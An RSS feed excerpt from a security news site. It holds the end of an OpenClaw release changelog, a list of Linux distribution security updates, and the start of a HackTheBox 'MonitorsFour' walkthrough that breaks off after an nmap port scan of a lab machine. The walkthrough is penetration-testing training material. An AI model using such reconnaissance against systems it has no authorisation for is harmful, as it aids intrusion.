<p>Cron: preserve unsupported persisted cron payload rows during routine store writes while keeping those rows non-runnable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4493956816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/84922/hovercard" href="https://github.com/openclaw/openclaw/issues/84922">#84922</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515779319" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86415" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86415/hovercard" href="https://github.com/openclaw/openclaw/pull/86415">#86415</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IWhatsskill/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IWhatsskill">@IWhatsskill</a>.</p>
</li>
<li>
<p>Updater: exclude prerelease git tags from stable channel resolution so source updates do not check out newer alpha/rc/preview/canary tags. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513592243" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86260" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86260/hovercard" href="https://github.com/openclaw/openclaw/pull/86260">#86260</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stevenepalmer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stevenepalmer">@stevenepalmer</a>.</p>
</li>
<li>
<p>Security/Audit: flag webhook <code>hooks.token</code> reuse of active Gateway password auth in <code>openclaw security audit</code> while keeping password-mode startup compatibility. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4481368290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84338" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84338/hovercard" href="https://github.com/openclaw/openclaw/pull/84338">#84338</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coygeek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coygeek">@coygeek</a>.</p>
</li>
<li>
<p>QQBot: derive the outbound reply watchdog from configured agent and provider timeouts so slow local model replies are not cut off at five minutes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4500714861" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85267" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85267/hovercard" href="https://github.com/openclaw/openclaw/issues/85267">#85267</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4500805571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85271" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85271/hovercard" href="https://github.com/openclaw/openclaw/pull/85271">#85271</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</p>
</li>
<li>
<p>Agents/heartbeat: stop heartbeat turns after the first valid <code>heartbeat_respond</code> so repeated response loops do not burn tokens. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514870807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86357" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86357/hovercard" href="https://github.com/openclaw/openclaw/pull/86357">#86357</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/udaymanish6/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/udaymanish6">@udaymanish6</a>.</p>
</li>
<li>
<p>Tasks: keep retained lost tasks out of default status health counts, explain their cleanup window during maintenance, and prune lost task records after 24 hours instead of the general 7-day terminal retention.</p>
</li>
<li>
<p>Memory-core: keep REM dreaming focused on live light-staged memories and mark staged entries as considered so old recall history no longer dominates fresh candidates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513935517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86302" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86302/hovercard" href="https://github.com/openclaw/openclaw/pull/86302">#86302</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a>.</p>
</li>
<li>
<p>Memory: abort sync instead of downgrading an existing semantic vector index to FTS-only when the configured embedding provider is temporarily unavailable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4507908481" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85704" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85704/hovercard" href="https://github.com/openclaw/openclaw/pull/85704">#85704</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yaaboo-gif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yaaboo-gif">@yaaboo-gif</a>.</p>
</li>
<li>
<p>Telegram: propagate forum topic names through the account-scoped topic cache for native command context and topic create/edit actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513918910" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86299" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86299/hovercard" href="https://github.com/openclaw/openclaw/pull/86299">#86299</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a>.</p>
</li>
<li>
<p>Slack: keep downloaded read-only files out of reply media so Slack file reads do not echo files back to the conversation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514166403" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86318" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86318/hovercard" href="https://github.com/openclaw/openclaw/pull/86318">#86318</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</p>
</li>
<li>
<p>Cron: accept leading-plus relative durations such as <code>+5m</code> for one-shot <code>--at</code> schedules. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514566090" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86341" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86341/hovercard" href="https://github.com/openclaw/openclaw/pull/86341">#86341</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mushuiyu886/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mushuiyu886">@mushuiyu886</a>.</p>
</li>
<li>
<p>Agents/media: preserve async-started media tool metadata so background generation starts no longer surface generic incomplete-turn warnings while replay stays unsafe. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4510559084" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85933" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85933/hovercard" href="https://github.com/openclaw/openclaw/pull/85933">#85933</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</p>
</li>
<li>
<p>Docker E2E: dedupe scheduler lane resources so npm/service package lanes are not over-counted and serialized unnecessarily.</p>
</li>
<li>
<p>QA/diagnostics: add a collector-backed OpenTelemetry smoke lane, make the OTLP payload leak check scenario-aware, and keep source QA builds from failing on optional dependency imports resolved through pnpm's temp module path.</p>
</li>
<li>
<p>Crabbox: bootstrap Git metadata for sparse remote changed gates so raw synced workspaces can run <code>pnpm check:changed</code> from the intended diff.</p>
</li>
<li>
<p>xAI/LM Studio: avoid buffering ordinary bracketed or <code>final</code> prose until stream completion while watching for plain-text tool-call fallbacks.</p>
</li>
<li>
<p>Doctor: warn and continue when the cron job store exists but cannot be read so later health checks still run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4512146374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86102" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/86102/hovercard" href="https://github.com/openclaw/openclaw/issues/86102">#86102</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515361802" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86384" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86384/hovercard" href="https://github.com/openclaw/openclaw/pull/86384">#86384</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1052326311/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1052326311">@1052326311</a>.</p>
</li>
<li>
<p>Discord: suppress a bot's previous reply body and referenced media from prompt context when a user replies to that bot message, while keeping reply metadata for routing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513382967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86238" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86238/hovercard" href="https://github.com/openclaw/openclaw/pull/86238">#86238</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</p>
</li>
<li>
<p>Discord: restore bare numeric channel IDs for outbound message-tool sends while keeping explicit DM targets unambiguous. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4518354506" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86571" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86571/hovercard" href="https://github.com/openclaw/openclaw/pull/86571">#86571</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</p>
</li>
<li>
<p>Docker E2E: avoid rebuilding the Control UI twice while preparing the shared OpenClaw package tarball for package-backed scenario runs.</p>
</li>
<li>
<p>Tests: avoid rebuilding the Control UI twice during the installer Docker smoke now that <code>pnpm build</code> includes <code>ui:build</code>.</p>
</li>
<li>
<p>Tests: give QA config mutation RPCs enough native Windows budget to finish gateway config writes and restart settle after hot scenario runs.</p>
</li>
<li>
<p>Tests: keep the gateway restart-inflight QA scenario focused on restart recovery on native Windows by allowing expected embedded prompt handoff errors and using the Windows-safe timeout budget.</p>
</li>
<li>
<p>QA-Lab: make the synthetic OpenAI provider honor generic <code>reply exactly:</code> directives after required kickoff reads so restart-recovery scenarios do not fall through to generic repo-summary prose.</p>
</li>
<li>
<p>Gateway: abort active <code>agent</code> RPC runs during forced restart shutdown so stale in-process turns cannot keep writing a session after the Gateway lifecycle restarts.</p>
</li>
<li>
<p>Crabbox: sync clean sparse worktrees through a temporary full checkout even when reusing an existing lease so tracked build-time files are not omitted.</p>
</li>
<li>
<p>Build: route <code>scripts/ui.js</code> through the shared pnpm runner and keep Control UI chunking helpers in sparse-included source so native Windows Corepack builds can produce <code>dist/control-ui</code>.</p>
</li>
<li>
<p>Tests: give the memory fallback QA scenario enough turn budget to exercise native Windows gateway runs instead of failing on the client timeout while the mock agent is still dispatching.</p>
</li>
<li>
<p>Tests: collect QA gateway CPU/RSS metrics on native Windows and give the channel baseline enough turn budget to report slow gateway runs instead of timing out before proof.</p>
</li>
<li>
<p>Install/update: bypass npm <code>min-release-age</code> policies with <code>--min-release-age=0</code> instead of <code>--before</code> so hosted installers keep working on npm versions that reject the combined config. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4490856882" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84749" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84749/hovercard" href="https://github.com/openclaw/openclaw/pull/84749">#84749</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TeodoroRodrigo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TeodoroRodrigo">@TeodoroRodrigo</a>.</p>
</li>
<li>
<p>Diagnostics: reclaim wedged session lanes when stale active-run bookkeeping blocks queued work despite no forward progress. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506871185" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85639" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85639/hovercard" href="https://github.com/openclaw/openclaw/issues/85639">#85639</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</p>
</li>
<li>
<p>WebChat: keep message-tool replies visible in the chat while still summarizing internal tool results for the model. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514654012" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86347" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/86347/hovercard" href="https://github.com/openclaw/openclaw/issues/86347">#86347</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Gateway/perf: fail startup benchmark samples when the Gateway process exits before benchmark teardown, including signal deaths after readiness probes.</p>
</li>
<li>
<p>Gateway/perf: fail restart benchmark samples when the Gateway exits before benchmark teardown, including clean exits and signal deaths after successful restart probes.</p>
</li>
<li>
<p>Agents/tests: keep model catalog visibility on static selection helpers so catalog visibility checks avoid the broad model-selection barrel import.</p>
</li>
<li>
<p>Agents/commitments: serialize commitment store load-modify-save writes so concurrent heartbeat and CLI updates no longer lose dismissal, sent, or attempt state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432420395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81153" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81153/hovercard" href="https://github.com/openclaw/openclaw/pull/81153">#81153</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</p>
</li>
<li>
<p>xAI/LM Studio: promote plain-text tool-call fallbacks into structured tool calls and strip leaked internal tool syntax before user-facing delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513214742" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86222" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86222/hovercard" href="https://github.com/openclaw/openclaw/pull/86222">#86222</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</p>
</li>
<li>
<p>CLI: suppress benign self-update version-skew warnings during package post-update finalization.</p>
</li>
<li>
<p>Gateway/perf: tighten restart and startup benchmark failure handling so long profiling runs, failed probes, and fresh Linux runners no longer produce false passing or <code>n/a</code> results.</p>
</li>
<li>
<p>Checks: keep intentional Knip unused-file findings optional so full CI and sparse proof workspaces stay aligned.</p>
</li>
<li>
<p>Docker: restore writable <code>~/.config</code> in runtime images. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4510825052" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85968" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85968/hovercard" href="https://github.com/openclaw/openclaw/issues/85968">#85968</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hkoessler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hkoessler">@hkoessler</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>.</p>
</li>
<li>
<p>Plugin SDK: keep legacy root diagnostic subscriptions connected when built plugin SDK aliases resolve diagnostic helpers through a separate module graph.</p>
</li>
<li>
<p>Diagnostics: export alertable OTel and Prometheus signals for blocked tools, model failover, stale sessions, liveness warnings, oversized payloads, and webhook ingress while fixing shared OTLP endpoints with query strings.</p>
</li>
<li>
<p>Tests: normalize macOS canonical temp paths in exec allowlists, fs-safe trash assertions, installed plugin matching, Telegram topic-name stores, and built ACPX MCP server expectations so native macOS proof runners cover the intended behavior.</p>
</li>
<li>
<p>Codex/app-server: preserve message-tool-only source reply delivery mode on active runs so sub-agent completion wakeups can steer the active Codex turn instead of being rejected. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513790064" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86287" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86287/hovercard" href="https://github.com/openclaw/openclaw/pull/86287">#86287</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ferminquant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ferminquant">@ferminquant</a>.</p>
</li>
<li>
<p>Tests: sample the Windows kitchen-sink RPC gateway directly and serialize RSS probes so native runs keep the memory guard active.</p>
</li>
<li>
<p>Tests: normalize bundled plugin lifecycle probe paths and state-root lookup so native Windows release sweeps accept valid packaged plugin installs.</p>
</li>
<li>
<p>Agents/Claude CLI: route live native Bash permission requests through OpenClaw exec policy so Claude turns no longer stall on <code>control_request</code>, and document that OpenClaw exec policy is authoritative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4425323621" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80819" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80819/hovercard" href="https://github.com/openclaw/openclaw/issues/80819">#80819</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514343781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86330" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86330/hovercard" href="https://github.com/openclaw/openclaw/pull/86330">#86330</a>, from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4450374694" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81971" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81971/hovercard" href="https://github.com/openclaw/openclaw/pull/81971">#81971</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guthirry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guthirry">@guthirry</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Security audit: warn when YOLO OpenClaw exec policy overrides a restrictive raw Claude <code>--permission-mode</code> for managed live sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4518138669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86557" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86557/hovercard" href="https://github.com/openclaw/openclaw/pull/86557">#86557</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Config: keep benign legacy metadata write anomalies out of default doctor and config command output while preserving explicit anomaly logging for diagnostics.</p>
</li>
<li>
<p>Codex: log when implicit app-server <code>never</code> approvals are promoted for OpenClaw tool policy, including whether the trigger was a <code>before_tool_call</code> hook or trusted tool policy.</p>
</li>
<li>
<p>Codex harness: make subscription usage-limit errors without reset times explain that OpenClaw cannot determine the reset and point users to wait until Codex is available, use another Codex account, or switch to another configured model/provider. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Google Vertex: support production ADC modes such as Workload Identity Federation, service-account credentials, and metadata-server ADC for the native Vertex transport. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4474267416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83971" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83971/hovercard" href="https://github.com/openclaw/openclaw/pull/83971">#83971</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/damianFelixPago/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/damianFelixPago">@damianFelixPago</a>.</p>
</li>
<li>
<p>Telegram: route normal <code>[telegram][diag]</code> polling diagnostics through <code>runtime.log</code> while keeping non-diag warnings and persistence failures on <code>runtime.error</code>, so healthy polling startup no longer looks like an error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462473913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82957" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82957/hovercard" href="https://github.com/openclaw/openclaw/issues/82957">#82957</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462475221" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82958" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82958/hovercard" href="https://github.com/openclaw/openclaw/pull/82958">#82958</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</p>
</li>
<li>
<p>Providers/Ollama: strip inline Kimi cloud reasoning prefixes from streamed and final visible replies while keeping ordinary Kimi answers append-only. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513786914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86286" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86286/hovercard" href="https://github.com/openclaw/openclaw/pull/86286">#86286</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jason-allen-oneal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jason-allen-oneal">@jason-allen-oneal</a>.</p>
</li>
<li>
<p>Gateway: require Talk secret authority before setup-code handoff can include Talk secrets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4507699906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85690" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85690/hovercard" href="https://github.com/openclaw/openclaw/pull/85690">#85690</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</p>
</li>
<li>
<p>Agents: keep fallback error reporting scoped to the active model candidate so stale prior-provider quota/auth text is not reported for later fallback attempts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4512330133" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86134" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86134/hovercard" href="https://github.com/openclaw/openclaw/pull/86134">#86134</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>iMessage: dedupe watcher startup when <code>channels.imessage.accounts</code> lists both <code>default</code> and a named account that point at the same local Messages source, so the gateway no longer spawns two <code>imsg rpc</code> processes or doubles inbound replies; the dedupe is scoped to watcher startup, leaving duplicate accounts addressable for outbound sends, status, and capability listings, and <code>openclaw doctor</code> flags the redundant account with a rebinding hint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246413314" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65141" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65141/hovercard" href="https://github.com/openclaw/openclaw/issues/65141">#65141</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520556743" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86705" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86705/hovercard" href="https://github.com/openclaw/openclaw/pull/86705">#86705</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/swang430/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/swang430">@swang430</a>.</p>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (postorius and spip), Fedora (bind, bind-dyndb-ldap, linux-firmware, tor, and unbound), Mageia (ffmpeg, nginx, perl-Imager, and tigervnc, x11-server, x11-server-xwayland), Oracle (firefox and kernel), Red Hat (buildah, git-lfs, go-toolset:rhel8, golang,...]]></description>
<link>https://tsecurity.de/de/3548101/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548101/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 26 May 2026 15:11:17 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (postorius and spip), <b>Fedora</b> (bind, bind-dyndb-ldap, linux-firmware, tor, and unbound), <b>Mageia</b> (ffmpeg, nginx, perl-Imager, and tigervnc, x11-server, x11-server-xwayland), <b>Oracle</b> (firefox and kernel), <b>Red Hat</b> (buildah, git-lfs, go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, gvisor-tap-vsock, java-1.8.0-openjdk, java-17-openjdk, java-21-openjdk, opentelemetry-collector, osbuild-composer, podman, rhc, rhc-worker-playbook, skopeo, and yggdrasil), <b>SUSE</b> (amazon-ecs-init, assimp, azure-storage-azcopy, busybox, firefox, gnutls, graphicsmagick, helm, kernel, leancrypto, libpng16, libppsdocument4_0-6, libsndfile, mcphost, nano, nginx, perl-http-tiny, perl-XML-LibXML, python-urllib3, python-urllib3_1, python311-ocrmypdf, python312, rclone, rsync, xen, and xz), and <b>Ubuntu</b> (dotnet8, dotnet9, dotnet10, linux-intel-iot-realtime, linux-lowlatency, linux-nvidia-6.8, linux-nvidia-tegra, linux-nvidia-tegra-igx, nltk, simpleeval, and vim).]]></content:encoded>
</item>
<item>
<title><![CDATA[MonitorsFour HTB — HackTheBox Walkthrough | By Alham Rizvi]]></title>
<description><![CDATA[Hello everyone, This is Alham Rizvi again, finally this machine is retired and here is my writeup for it, So let’s get started. Before we begin, make sure to follow me on my socials for more HTB writeups, CTF content, and cybersecurity stuff.Hello everyone, finally this machine is retired and her...]]></description>
<link>https://tsecurity.de/de/3545221/hacking/monitorsfour-htb-hackthebox-walkthrough-by-alham-rizvi/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545221/hacking/monitorsfour-htb-hackthebox-walkthrough-by-alham-rizvi/</guid>
<pubDate>Mon, 25 May 2026 11:20:41 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wBiA6IHD8JiiAUOk562JbA.png"></figure><p>Hello everyone, This is Alham Rizvi again, finally this machine is retired and here is my writeup for it, So let’s get started. Before we begin, make sure to follow me on my socials for more HTB writeups, CTF content, and cybersecurity stuff.Hello everyone, finally this machine is retired and here is my writeup for it.</p><h3>Attack Chain</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/658/1*bZ5AOtrv1owIlK0FUzTzgA.png"></figure><h3>Reconaissance</h3><h4>Port scanning</h4><p>We start with classic recon by performing a full port scan. The goal here is to identify exposed services and understand the attack surface before interacting with the target further.</p><pre>alhamrizvi@alhams-fedora:~/mf$ sudo nmap -sS -sV 10.129.1.102 -oN out.txt<br>[sudo] password for alhamrizvi:<br>...<br><br>80/tcp   open  http    nginx<br>5985/tcp open  http    Microsoft HTTPAPI httpd 2.0<br>...<br>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .<br>Nmap done: 1 IP address (1 host up) scanned in 111.67 seconds</pre><p>Port 80 